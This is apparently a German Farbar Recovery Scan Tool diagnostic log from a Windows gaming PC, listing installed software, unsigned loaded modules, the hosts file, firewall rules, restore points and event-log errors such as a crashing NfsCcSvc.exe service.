(HKLM\...\{929FBD26-9020-399B-9A7A-751D61F0B942}) (Version: 12.0.21005 - Microsoft Corporation) Hidden Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005 (HKLM\...\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}) (Version: 12.0.21005 - Microsoft Corporation) Hidden Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.40664 (HKLM-x32\...\{D401961D-3A20-3AC7-943B-6139D5BD490A}) (Version: 12.0.40664 - Microsoft Corporation) Hidden Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.40664 (HKLM-x32\...\{8122DAB1-ED4D-3676-BB0A-CA368196543E}) (Version: 12.0.40664 - Microsoft Corporation) Hidden Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.28.29913 (HKLM-x32\...\{855e31d2-9031-46e1-b06d-c9d7777deefb}) (Version: 14.28.29913.0 - Microsoft Corporation) Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.28.29334 (HKLM-x32\...\{b2d0f752-adc5-496e-8f70-8669de01f746}) (Version: 14.28.29334.0 - Microsoft Corporation) Microsoft Visual C++ 2019 X64 Additional Runtime - 14.28.29913 (HKLM\...\{620A7633-7A09-42A8-8580-076A4483C4B0}) (Version: 14.28.29913 - Microsoft Corporation) Hidden Microsoft Visual C++ 2019 X64 Minimum Runtime - 14.28.29913 (HKLM\...\{EECDD137-13DA-46ED-ADA0-BDF7F8BE65B8}) (Version: 14.28.29913 - Microsoft Corporation) Hidden Microsoft Visual C++ 2019 X86 Additional Runtime - 14.28.29334 (HKLM-x32\...\{14C49FC8-3E9B-4F29-8526-26629B5CF30B}) (Version: 14.28.29334 - Microsoft Corporation) Hidden Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.28.29334 (HKLM-x32\...\{0D01A812-82A1-481F-8546-8E28E976F8DF}) (Version: 14.28.29334 - Microsoft Corporation) Hidden NVIDIA FrameView SDK 1.2.7521.31103277 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_FrameViewSdk) (Version: 1.2.7521.31103277 - NVIDIA Corporation) NVIDIA GeForce Experience 3.25.1.27 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.25.1.27 - NVIDIA Corporation) NVIDIA Grafiktreiber 512.95 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 512.95 - NVIDIA Corporation) NVIDIA HD-Audiotreiber 1.3.39.3 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.39.3 - NVIDIA Corporation) NVIDIA PhysX (HKLM-x32\...\{3F5C371F-8EA2-4F25-9D3D-D0B4526E3AEA}) (Version: 9.10.0513 - NVIDIA Corporation) NVIDIA PhysX-Systemsoftware 9.21.0713 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.21.0713 - NVIDIA Corporation) OpenAL (HKLM-x32\...\OpenAL) (Version: - ) Origin (HKLM-x32\...\Origin) (Version: 10.5.113.50894 - Electronic Arts, Inc.) Paradox Launcher v2 (HKLM\...\{66DA3501-823A-4F07-A20D-C64495A59DC8}) (Version: 2.1.0 - Paradox Interactive) Patriot Viper DRAM RGB (HKLM\...\{1F9C282E-CCB4-4D8E-A5CB-7B74DFCD8C95}) (Version: 1.0.9.2 - Patriot Memory) Hidden Patriot Viper DRAM RGB (HKLM-x32\...\{fdc098ce-d76c-4e2e-a0a6-01a24e9a1f7d}) (Version: 1.0.9.2 - Patriot Memory) Patriot Viper M2 SSD RGB (HKLM\...\{8B4C0A3D-C135-4E1F-98D8-3926494B4D61}) (Version: 1.0.6.5 - Patriot Memory) Hidden Patriot Viper M2 SSD RGB (HKLM-x32\...\{387596e5-692e-4baf-bec2-3338d555df7a}) (Version: 1.0.6.5 - Patriot Memory) Pflanzen gegen Zombies™ (HKLM-x32\...\{5E6536C2-E79A-49CF-83EA-817AD81F9FC8}) (Version: 1.2.0.1093 - Electronic Arts, Inc.) PHISON HAL (HKLM\...\{966E33F0-6786-4B38-AA29-C1B3F6C1955D}) (Version: 1.0.9.0 - PHISON Electronics Corp.) Hidden PHISON HAL (HKLM-x32\...\{549da357-1b81-456b-83f2-dcc47c41dfff}) (Version: 1.0.9.0 - PHISON Electronics Corp.) Hidden PVZ Garden Warfare (HKLM-x32\...\{A5AC7D7B-C1D5-4AF9-8829-993DA335BE1B}) (Version: 1.0.3.0 - Electronic Arts) Realtek Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.9254.1 - Realtek Semiconductor Corp.) Roblox Player for Pauli (HKU\S-1-5-21-1424437550-2087844553-323541659-1001\...\roblox-player) (Version: - Roblox Corporation) Rockstar Games Launcher (HKLM-x32\...\Rockstar Games Launcher) (Version: 1.0.59.842 - Rockstar Games) Rockstar Games Social Club (HKLM-x32\...\Rockstar Games Social Club) (Version: 2.1.3.7 - Rockstar Games) ROG FAN XPERT 4 (HKLM-x32\...\{2dfe216d-3481-4684-ad4d-2566bd7cfe4f}) (Version: 2.00.09 - ASUSTek Computer Inc.) ROG Live Service (HKLM-x32\...\{2D87BFB6-C184-4A59-9BBE-3E20CE797631}) (Version: 1.4.10.0 - ASUSTek COMPUTER INC.) Setup 1.0.0 (HKLM\...\eb1a0fbb-fc70-428e-97f1-fa7080894806) (Version: 1.0.0 - ) Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation) TruckersMP Launcher 1.0.0.4 (HKLM\...\{A227B892-C548-4490-9C5D-DB341F8194A6}_is1) (Version: 1.0.0.4 - TruckersMP Team) TUF GAMING M3 (HKLM-x32\...\{89cc6449-58a5-4aae-b59f-f96ffd1ec35f}) (Version: 3.00.18 - ASUSTek Computer Inc.) Ubisoft Connect (HKLM-x32\...\Uplay) (Version: 130.1.10657 - Ubisoft) UE4 Prerequisites (x64) (HKLM\...\{D7B591D8-1091-4A00-A0B3-5301C45E5D51}) (Version: 1.0.14.0 - Epic Games, Inc.) Hidden UE4 Prerequisites (x64) (HKLM-x32\...\{0d995f46-317b-4b5f-bf3e-9f98bae9d339}) (Version: 1.0.14.0 - Epic Games, Inc.) Hidden Universal Holtek RGB DRAM (HKLM\...\{826388E4-E31F-4514-948B-3BB954FB3EAF}) (Version: 1.0.0.2 - PD) Hidden Universal Holtek RGB DRAM (HKLM-x32\...\{6870588f-9f28-488b-a169-cf548ad6b393}) (Version: 1.0.0.2 - PD) VGA (HKLM-x32\...\{0f87ebb7-aabb-43e5-9c5d-28744f517468}) (Version: 2.11.03 - ASUSTek Computer Inc.) WD_BLACK AN1500 (HKLM\...\{085E2365-0A70-4230-B664-02D5E4FE7E9C}) (Version: 1.0.14.0 - ENE TECHNOLOGY INC.) Hidden WD_BLACK AN1500 (HKLM-x32\...\{e42c5874-37b0-4977-9e8d-70bf006e1f76}) (Version: 1.0.14.0 - ENE TECHNOLOGY INC.) Hidden WeMod (HKU\S-1-5-21-1424437550-2087844553-323541659-1001\...\WeMod) (Version: 8.2.0 - WeMod) Packages: ========= ARMOURY CRATE -> C:\Program Files\WindowsApps\B9ECED6F.ArmouryCrate_5.1.5.0_x64__qmba6cd70vzyy [2022-04-08] (ASUSTeK COMPUTER INC.) Clustertruck -> C:\Program Files\WindowsApps\tinyBuildGames.3289435C1E20_1.0.3.0_x86__3sz1pp2ynv2xe [2022-06-16] (tinyBuild Games) Disney+ -> C:\Program Files\WindowsApps\Disney.37853FC22B2CE_1.30.6.0_x64__6rarf9sa4v8jt [2022-06-20] (Disney) DTS Audio Processing -> C:\Program Files\WindowsApps\DTSInc.DTSAudioProcessing_1.10.7.0_x64__t5j2fzbtdg37r [2022-05-06] (DTS, Inc.) Forza Horizon 5 -> C:\Program Files\WindowsApps\Microsoft.624F8B84B80_3.455.709.0_x64__8wekyb3d8bbwe [2022-04-27] (Microsoft Studios) Intel® Grafik-Kontrollraum -> C:\Program Files\WindowsApps\AppUp.IntelGraphicsExperience_1.100.3408.0_x64__8j3eq9eme6ctt [2022-05-20] (INTEL CORP) [Startup Task] Intel® Optane™ Memory and Storage Management -> C:\Program Files\WindowsApps\AppUp.IntelOptaneMemoryandStorageManagement_19.0.1026.0_x64__8j3eq9eme6ctt [2022-04-23] (INTEL CORP) Lively Wallpaper -> C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.122.0_x86__97hta09mmv6hy [2022-06-20] (rocksdanister) [Startup Task] Microsoft Flight Simulator -> C:\Program Files\WindowsApps\Microsoft.FlightSimulator_1.26.5.0_x64__8wekyb3d8bbwe [2022-06-19] (Microsoft Studios) Microsoft Flight Simulator Digital Ownership -> C:\Program Files\WindowsApps\Microsoft.DigitalOwnership_1.0.1.0_x64__8wekyb3d8bbwe [2022-06-19] (Microsoft Studios) Minecraft for Windows 10 -> C:\Program Files\WindowsApps\Microsoft.MinecraftUWP_1.19.5.0_x64__8wekyb3d8bbwe [2022-06-09] (Microsoft Studios) Minecraft Launcher -> C:\Program Files\WindowsApps\Microsoft.4297127D64EC6_1.1.17.0_x64__8wekyb3d8bbwe [2022-06-09] (Microsoft Studios) No Man's Sky -> C:\Program Files\WindowsApps\HelloGames.NoMansSky_3.92.22975.0_x64__bs190hzg1sesy [2022-06-18] (Hello Games) NVIDIA Control Panel -> C:\Program Files\WindowsApps\NVIDIACorp.NVIDIAControlPanel_8.1.962.0_x64__56jybvy8sckqj [2022-05-29] (NVIDIA Corp.) Realtek Audio Control -> C:\Program Files\WindowsApps\RealtekSemiconductorCorp.RealtekAudioControl_1.29.256.0_x64__dt26b99r8h8gj [2022-04-08] (Realtek Semiconductor Corp) Spotify Music -> C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.187.612.0_x86__zpdnekdrzrea0 [2022-06-20] (Spotify AB) [Startup Task] WindowsAppRuntime.1.0 -> C:\Program Files\WindowsApps\Microsoft.WindowsAppRuntime.1.0_3.469.1654.0_x64__8wekyb3d8bbwe [2022-04-29] (Microsoft Corporation) WindowsAppRuntime.1.0 -> C:\Program Files\WindowsApps\Microsoft.WindowsAppRuntime.1.0_3.469.1654.0_x86__8wekyb3d8bbwe [2022-04-29] (Microsoft Corporation) WindowsAppRuntime.1.1 -> C:\Program Files\WindowsApps\Microsoft.WindowsAppRuntime.1.1_1001.524.1918.0_x64__8wekyb3d8bbwe [2022-06-20] (Microsoft Corporation) WindowsAppRuntime.1.1 -> C:\Program Files\WindowsApps\Microsoft.WindowsAppRuntime.1.1_1001.524.1918.0_x86__8wekyb3d8bbwe [2022-06-20] (Microsoft Corporation) ==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ============== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2021-12-26] (Igor Pavlov) [Datei ist nicht signiert] ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2021-12-26] (Igor Pavlov) [Datei ist nicht signiert] ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\System32\DriverStore\FileRepository\nv_dispig.inf_amd64_647b4244e991951b\nvshext.dll [2022-05-21] (Nvidia Corporation -> NVIDIA Corporation) ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2021-12-26] (Igor Pavlov) [Datei ist nicht signiert] ==================== Codecs (Nicht auf der Ausnahmeliste) ==================== ==================== Verknüpfungen & WMI ======================== ==================== Geladene Module (Nicht auf der Ausnahmeliste) ============= 2022-06-20 15:48 - 2022-06-20 15:48 - 000925184 _____ () [Datei ist nicht signiert] [Datei wird verwendet] C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.122.0_x86__97hta09mmv6hy\Build\plugins\cef\CefSharp.BrowserSubprocess.Core.dll 2022-06-20 15:48 - 2022-06-20 15:48 - 001395712 _____ () [Datei ist nicht signiert] [Datei wird verwendet] C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.122.0_x86__97hta09mmv6hy\Build\plugins\cef\CefSharp.Core.Runtime.dll 2022-01-10 07:36 - 2022-01-10 07:36 - 000515584 _____ () [Datei ist nicht signiert] \\?\C:\Program Files (x86)\ASUS\ArmouryDevice\node_modules\ac_node_addon\prebuilds\win32-ia32\node.napi.node 2022-01-11 16:52 - 2022-01-11 16:52 - 000479744 _____ () [Datei ist nicht signiert] \\?\C:\Program Files (x86)\ASUS\ArmouryDevice\node_modules\ffi-napi\prebuilds\win32-ia32\node.napi.node 2022-01-11 16:52 - 2022-01-11 16:52 - 000470016 _____ () [Datei ist nicht signiert] \\?\C:\Program Files (x86)\ASUS\ArmouryDevice\node_modules\ref-napi\prebuilds\win32-ia32\node.napi.node 2022-01-10 07:36 - 2022-01-10 07:36 - 000832512 _____ () [Datei ist nicht signiert] \\?\C:\Program Files (x86)\ASUS\ArmouryDevice\node_modules\usb-detection\prebuilds\win32-ia32\node.napi.node 2021-12-23 15:51 - 2021-12-23 15:51 - 000081920 _____ () [Datei ist nicht signiert] C:\Program Files (x86)\ASUS\ArmouryDevice\dll\WindowID\WindowID.dll 2022-04-08 20:41 - 2022-03-04 04:23 - 126965248 _____ () [Datei ist nicht signiert] C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\libcef.dll 2022-04-08 20:41 - 2021-11-17 13:38 - 000384000 _____ () [Datei ist nicht signiert] C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\libegl.dll 2022-04-08 20:41 - 2021-11-17 13:38 - 008006656 _____ () [Datei ist nicht signiert] C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\libglesv2.dll 2022-06-20 15:48 - 2022-06-20 15:48 - 149314048 _____ () [Datei ist nicht signiert] C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.122.0_x86__97hta09mmv6hy\Build\plugins\cef\libcef.dll 2022-06-20 15:48 - 2022-06-20 15:48 - 000357376 _____ () [Datei ist nicht signiert] C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.122.0_x86__97hta09mmv6hy\Build\plugins\cef\libegl.dll 2022-06-20 15:48 - 2022-06-20 15:48 - 005583872 _____ () [Datei ist nicht signiert] C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.122.0_x86__97hta09mmv6hy\Build\plugins\cef\libglesv2.dll 2022-06-20 15:48 - 2022-06-20 15:48 - 003519488 _____ () [Datei ist nicht signiert] C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.122.0_x86__97hta09mmv6hy\Build\plugins\cef\vk_swiftshader.dll 2019-08-13 15:38 - 2019-08-13 15:38 - 000147456 _____ () [Datei ist nicht signiert] C:\ProgramData\NFS\v3\nfccapi.dll 2020-05-26 17:08 - 2020-05-26 17:08 - 002831360 _____ (Apache Software Foundation) [Datei ist nicht signiert] C:\Program Files (x86)\LightingService\log4cxx.dll 2022-04-29 22:57 - 2022-04-29 22:57 - 000057344 _____ (Google) [Datei ist nicht signiert] [Datei wird verwendet] C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.122.0_x86__97hta09mmv6hy\Build\GrpcDotNetNamedPipes.dll 2022-04-10 12:52 - 2021-12-26 16:00 - 000093696 _____ (Igor Pavlov) [Datei ist nicht signiert] C:\Program Files\7-Zip\7-zip.dll 2022-04-29 22:57 - 2022-04-29 22:57 - 000056832 _____ (Linearstar) [Datei ist nicht signiert] [Datei wird verwendet] C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.122.0_x86__97hta09mmv6hy\Build\RawInput.Sharp.dll 2022-06-20 15:48 - 2022-06-20 15:48 - 000026112 _____ (Lively) [Datei ist nicht signiert] [Datei wird verwendet] C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.122.0_x86__97hta09mmv6hy\Build\de\Lively.resources.dll 2022-06-20 15:48 - 2022-06-20 15:48 - 000428032 _____ (Lively) [Datei ist nicht signiert] [Datei wird verwendet] C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.122.0_x86__97hta09mmv6hy\Build\Lively.dll 2022-06-20 15:48 - 2022-06-20 15:48 - 000111616 _____ (Lively.Common) [Datei ist nicht signiert] [Datei wird verwendet] C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.122.0_x86__97hta09mmv6hy\Build\Lively.Common.dll 2022-06-20 15:48 - 2022-06-20 15:48 - 000152576 _____ (Lively.Grpc.Common) [Datei ist nicht signiert] [Datei wird verwendet] C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.122.0_x86__97hta09mmv6hy\Build\Lively.Grpc.Common.dll 2022-06-20 15:48 - 2022-06-20 15:48 - 000042496 _____ (Lively.Models) [Datei ist nicht signiert] [Datei wird verwendet] C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.122.0_x86__97hta09mmv6hy\Build\Lively.Models.dll 2022-04-29 22:57 - 2022-04-29 22:57 - 000005120 _____ (Matteo Pagani) [Datei ist nicht signiert] [Datei wird verwendet] C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.122.0_x86__97hta09mmv6hy\Build\DesktopBridge.Helpers.dll 2019-08-13 15:38 - 2019-08-13 15:38 - 000373760 _____ (NetFilterSDK.com) [Datei ist nicht signiert] C:\ProgramData\NFS\v3\protflt.dll 2022-06-20 15:48 - 2022-06-20 15:48 - 000828928 _____ (NLog) [Datei ist nicht signiert] [Datei wird verwendet] C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.122.0_x86__97hta09mmv6hy\Build\NLog.dll 2022-01-31 11:48 - 2022-01-31 11:48 - 000090112 _____ (Silicon Laboratories, Inc.) [Datei ist nicht signiert] C:\Program Files\Corsair\CORSAIR iCUE 4 Software\SiUSBXp.dll 2022-04-29 22:57 - 2022-04-29 22:57 - 000032768 _____ (Soroush Falahati (falahati.net)) [Datei ist nicht signiert] [Datei wird verwendet] C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.122.0_x86__97hta09mmv6hy\Build\UACHelper.dll 2022-04-08 20:41 - 2022-03-04 04:23 - 000983552 _____ (The Chromium Authors) [Datei ist nicht signiert] C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\chrome_elf.dll 2022-06-20 15:48 - 2022-06-20 15:48 - 000990208 _____ (The Chromium Authors) [Datei ist nicht signiert] C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.122.0_x86__97hta09mmv6hy\Build\plugins\cef\chrome_elf.dll 2022-06-20 17:16 - 2021-10-22 11:27 - 003394560 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [Datei ist nicht signiert] C:\Program Files (x86)\ASUS\ArmouryDevice\dll\MBLedSDK\libcrypto-1_1-x64.dll 2022-06-20 17:16 - 2021-10-22 11:27 - 000679424 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [Datei ist nicht signiert] C:\Program Files (x86)\ASUS\ArmouryDevice\dll\MBLedSDK\libssl-1_1-x64.dll 2022-04-15 19:31 - 2022-04-15 19:31 - 001282048 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\LIBEAY32.dll 2022-04-15 19:31 - 2022-04-15 19:31 - 000279040 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\ssleay32.dll 2022-06-14 22:22 - 2022-06-14 22:22 - 002815488 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [Datei ist nicht signiert] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\libcrypto-1_1-x64.dll 2022-06-14 22:22 - 2022-06-14 22:22 - 000678400 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [Datei ist nicht signiert] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\libssl-1_1-x64.dll 2019-08-13 15:38 - 2019-08-13 15:38 - 002648576 _____ (The OpenSSL Project, hxxps://www.openssl.org/) [Datei ist nicht signiert] C:\ProgramData\NFS\v3\libcrypto-1_1.dll 2019-08-13 15:38 - 2019-08-13 15:38 - 000640512 _____ (The OpenSSL Project, hxxps://www.openssl.org/) [Datei ist nicht signiert] C:\ProgramData\NFS\v3\libssl-1_1.dll 2022-04-15 19:31 - 2022-04-15 19:31 - 001611264 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\platforms\qwindows.dll 2022-06-11 19:57 - 2022-04-15 19:31 - 005487104 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\Qt5Core.dll 2022-06-11 19:57 - 2022-04-15 19:31 - 005841920 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\Qt5Gui.dll 2022-06-11 19:57 - 2022-04-15 19:31 - 001179136 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\Qt5Network.dll 2022-06-11 19:57 - 2022-04-15 19:31 - 000146432 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\Qt5WebSockets.dll 2022-06-11 19:57 - 2022-04-15 19:31 - 005089792 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\Qt5Widgets.dll 2022-06-11 19:57 - 2022-04-15 19:31 - 000184832 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\Qt5Xml.dll 2022-06-14 22:22 - 2022-06-14 22:22 - 000046592 _____ (The Qt Company Ltd.) [Datei ist nicht signiert] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\bearer\qgenericbearer.dll 2022-06-14 22:22 - 2022-06-14 22:22 - 006270976 _____ (The Qt Company Ltd.) [Datei ist nicht signiert] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\Qt5Core.dll 2022-06-14 22:22 - 2022-06-14 22:22 - 001389568 _____ (The Qt Company Ltd.) [Datei ist nicht signiert] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\Qt5Network.dll 2022-06-14 22:22 - 2022-06-14 22:22 - 000157184 _____ (The Qt Company Ltd.) [Datei ist nicht signiert] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\Qt5WebSockets.dll 2022-06-14 22:22 - 2022-06-14 22:22 - 000210432 _____ (The Qt Company Ltd.) [Datei ist nicht signiert] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\Qt5Xml.dll ==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) ======== ==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ================== ==================== Verknüpfungen (Nicht auf der Ausnahmeliste) ================= ==================== Internet Explorer (Nicht auf der Ausnahmeliste) ========== ==================== Hosts Inhalt: ========================= (Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.) 2021-06-05 14:08 - 2022-06-20 17:28 - 000000027 _____ C:\Windows\system32\drivers\etc\hosts 127.0.0.1 localhost ==================== Andere Bereiche =========================== (Aktuell gibt es keinen automatisierten Fix für diesen Bereich.) HKU\S-1-5-21-1424437550-2087844553-323541659-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Pauli\Downloads\3840x2160-dodge-challenger-srt-in-usa_1565054844.jpg DNS Servers: 192.168.1.254 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 2) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: ) ist aktiviert. ==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge == (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.) MSCONFIG\Services: CC-Updater => 2 HKU\S-1-5-21-1424437550-2087844553-323541659-1001\...\StartupApproved\Run: => "OneDrive" ==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ================ (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) FirewallRules: [TCP Query User{0FC24FCD-1E86-4DC1-8639-7E2E08E35227}C:\program files (x86)\asus\armourydevice\dll\armourysocketserver\armourysocketserver.exe] => (Allow) C:\program files (x86)\asus\armourydevice\dll\armourysocketserver\armourysocketserver.exe (ASUSTeK COMPUTER INC. -> ASUS) FirewallRules: [UDP Query User{9C2807E4-1CF0-4E9B-BBFF-983AA335387F}C:\program files (x86)\asus\armourydevice\dll\armourysocketserver\armourysocketserver.exe] => (Allow) C:\program files (x86)\asus\armourydevice\dll\armourysocketserver\armourysocketserver.exe (ASUSTeK COMPUTER INC. -> ASUS) FirewallRules: [TCP Query User{41C6B63B-D6B8-46A2-AF14-D825E5C12B39}C:\program files (x86)\asus\armourydevice\asus_framework.exe] => (Allow) C:\program files (x86)\asus\armourydevice\asus_framework.exe (ASUSTeK COMPUTER INC. -> ASUSTek Computer Inc.) FirewallRules: [UDP Query User{BEAF3A7D-869A-4918-ACAE-D7894CD6754B}C:\program files (x86)\asus\armourydevice\asus_framework.exe] => (Allow) C:\program files (x86)\asus\armourydevice\asus_framework.exe (ASUSTeK COMPUTER INC. -> ASUSTek Computer Inc.) FirewallRules: [{0F8311FA-5A4E-4284-82E1-F3ED00A2A686}] => (Allow) C:\Program Files (x86)\Steam\steam.exe (Valve Corp. -> Valve Corporation) FirewallRules: [{D4FF33F7-1362-43FE-8831-EF308C1E0E97}] => (Allow) C:\Program Files (x86)\Steam\steam.exe (Valve Corp. -> Valve Corporation) FirewallRules: [{A318DA9D-FB5E-4927-94D5-368598ECB351}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve Corp. -> Valve Corporation) FirewallRules: [{CBB66FC5-07E4-4229-A5EC-DDC094E7BC9D}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve Corp. -> Valve Corporation) ==================== Wiederherstellungspunkte ========================= 11-06-2022 20:24:42 UE4 Prerequisites (x64) 17-06-2022 13:59:15 Windows Modules Installer 19-06-2022 21:21:23 Windows Modules Installer ==================== Fehlerhafte Geräte im Gerätemanager ============ ==================== Fehlereinträge in der Ereignisanzeige: ======================== Applikationsfehler: ================== Error: (06/20/2022 05:28:38 PM) (Source: Microsoft-Windows-WMI) (EventID: 4) (User: NT-AUTORITÄT) Description: Fehler "0x8004401e" beim Laden des MOF "C:\WINDOWS\SYSTEM32\DE-DE\ROOTPORTERR.MFL" während der Wiederherstellung der für die automatische Wiederherstellung markierten MOF-Datei. Error: (06/20/2022 05:28:38 PM) (Source: Microsoft-Windows-WMI) (EventID: 4) (User: NT-AUTORITÄT) Description: Fehler "0x8004401e" beim Laden des MOF "C:\WINDOWS\SYSTEM32\ROOTPORTERR.MOF" während der Wiederherstellung der für die automatische Wiederherstellung markierten MOF-Datei. Error: (06/20/2022 05:28:16 PM) (Source: VSS) (EventID: 8193) (User: ) Description: Volumeschattenkopie-Dienstfehler: Beim Aufrufen von Routine "QueryFullProcessImageNameW" ist ein unerwarteter Fehler aufgetreten. hr = 0x8007001f, Ein an das System angeschlossenes Gerät funktioniert nicht. . Vorgang: Asynchroner Vorgang wird ausgeführt Kontext: Aktueller Status: DoSnapshotSet Error: (06/20/2022 05:28:09 PM) (Source: VSS) (EventID: 8194) (User: ) Description: Volumeschattenkopie-Dienstfehler: Beim Abfragen nach der Schnittstelle "IVssWriterCallback" ist ein unerwarteter Fehler aufgetreten. hr = 0x80070005, Zugriff verweigert . Die Ursache hierfür ist oft eine falsche Sicherheitseinstellung im Schreib- oder Anfrageprozess. Vorgang: Generatordaten werden gesammelt Kontext: Generatorklassen-ID: {e8132975-6f93-4464-a53e-1050253ae220} Generatorname: System Writer Generatorinstanz-ID: {74ccaa11-7a0c-4817-89a3-8ed868088484} Error: (06/20/2022 05:19:22 PM) (Source: Microsoft-Windows-RestartManager) (EventID: 10007) (User: NT-AUTORITÄT) Description: Die Anwendung oder der Dienst "ROG Live Service" konnte nicht neu gestartet werden. Error: (06/19/2022 09:09:05 PM) (Source: VSS) (EventID: 8193) (User: ) Description: Volumeschattenkopie-Dienstfehler: Beim Aufrufen von Routine "CoCreateInstance" ist ein unerwarteter Fehler aufgetreten. hr = 0x8007045b, Der Computer wird heruntergefahren. . Error: (06/19/2022 09:09:05 PM) (Source: VSS) (EventID: 13) (User: ) Description: Volumenschattenkopie-Dienst-Informationen: Der COM-Server mit CLSID {4e14fba2-2e22-11d1-9964-00c04fbbb345} und dem Namen "CEventSystem" kann nicht gestartet werden. [0x8007045b, Der Computer wird heruntergefahren. ] Error: (06/19/2022 10:42:31 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Name der fehlerhaften Anwendung: NfsCcSvc.exe, Version: 22.0.0.1800, Zeitstempel: 0x625eb293 Name des fehlerhaften Moduls: unknown, Version: 0.0.0.0, Zeitstempel: 0x00000000 Ausnahmecode: 0xc0000005 Fehleroffset: 0x010fff84 ID des fehlerhaften Prozesses: 0x5d40 Startzeit der fehlerhaften Anwendung: 0x01d88330fc7dfe39 Pfad der fehlerhaften Anwendung: C:\ProgramData\NFS\v3\NfsCcSvc.exe Pfad des fehlerhaften Moduls: unknown 